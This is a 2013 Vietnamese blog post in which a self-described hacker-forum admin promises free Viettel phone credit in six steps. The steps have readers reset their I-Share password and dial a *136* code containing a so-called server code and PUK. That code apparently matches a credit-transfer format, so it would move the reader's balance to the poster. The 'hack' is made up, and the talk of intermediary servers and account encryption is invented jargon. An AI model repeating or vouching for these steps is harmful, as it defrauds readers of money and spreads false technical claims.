Thứ Hai, 22 tháng 4, 2013

Hướng dẫn hack mã thẻ điện thoại mạng Viettel cực kỳ đơn giản


THỦ THUẬT HACK TIỀN CỦA MẠNG DIỆN THOẠI DI ĐỘNG VIETTEL


Nói đến hack tiền điện thoại của mạng VIETTEL chắc hẵn không ai không ngỡ ngàng và không tin về điều ấy

Nếu ai không tin cũng không sao,sau đây tôi xin giới thiệu những gì mà nhóm chúng tôi đã và đang làm,
Tôi NGUYỄN MINH LONG
Sinh viên năm 4 của DHBK-BKA Công Nghệ Thông Tin
Tôi không giám tự hào mình là 1 SV ưu tú Nhưng với những gì mình Khám phá ra được, tôi thấy rất hài lòng,chắc hẵn các bạn còn nhớ tới Diễn Đàn HA Vonline DĐ hacker lớn nhất hiện nay,và rất tự hào về mình cũng là 1 thành viên trong Ban Quản Trị của Diễn Đàn.với những Kinh Nghiệm mình đã tạo lập được, hôm nay tôi muốn giới thiệu 1 thủ thuật hách tiền của mang diện thoại Di Động của VIETTEL, hoàn toàn chính xác,do thời gian có hạn tôi giới thiệu tóm tắt như sau.
Các bạn chỉ cần thực hiện tuần tự chính xác 6 bước sau
1/ ĐIỀU KIỆN
Có 1 Sim VIETTEL hoạt động ít nhất 15 tháng vì chỉ có những sim đó VIETTEL mới đưa vào hệ thống bảo vệ bảo mật tài khoản trên server quản lý của VIETTEL
2/ Hãy soan tin nhắn sms ( MK gửi 136 ) sms miễn phí.
Nếu bạn có MK rồi thi bỏ qua bước này
vì sao phải làm thế ==> Vì chúng ta hack thông qua dịch vụ I-Share của VIETTEL
3/ gọi tới số 900, bấm phí số 3 và làm theo hướng dẫn, diều quan trọng là nằm ở bước này nè, đổi MK vừa lấy được thành 10010010, đó chính là mật khẩu của server trung gian ( ở bước 5)
vì sao phải làm thế, vì khi các bạn chuyển đổi thành dãy số trên, tức là đã mã hóa tài khoản của bạn trên server quản lý ( điều này rất quan trọng )
4/ Tài khoản chính trong sim nhiều hơn 32.090 VND
5/các bạn làm theo cú pháp sau
*136*mã pin*mã trung tâm Server*PUK server #( tất cả viết liền không dấu cách )
để khỏi mất thời gian của các bạn tôi đã tạo ra mã server trung gian viết tắt là TIS-Telephone intermediacy Server ) với mả Pin và PUK mặc định dùng dể đăng nhập số DT của bạn trên Server.
Mã pin = 10010010
Mã trung tâm Serve = 16-47-270-072
Mã PUK = 3-000-0
Công Thức *136*10010010*mã trung tâm Server*PUK server #( Chú Ý tất cả viết liền không dấu cách )
Các bạn chỉ cần nhập chính xác 3 dãy số trên vào cú pháp rồi nhấn pm1 gọi đi, hệ thống sẽ tự dộng đang nhập số DT của bạn vào TIS-Telephone intermediacy Server mà chúng tôi đã tạo ra.và số tiền hack được sẻ đươc cộng vào tài khoản của bạn (Như Hình trên).
6/ Sau khi song, các bạn vui lòng chờ 10 giây sẻ có tin nhắn trả về ( như hình trên ) với số tiền trong tài khoản chính là 301.000 VND hoặc 100.100 VND
Tất cả chỉ có bấy nhiêu Kinh Nghiệm ,mà tôi đưa ra, hãy test kết quả cho chung tôi nếu bạn thấy hài lòng, để chúng tôi có hưng phấn mở thêm Server
Mọi chi tiết xin liên hệ Email:hacker2012@gmail.com

Không có nhận xét nào:

Đăng nhận xét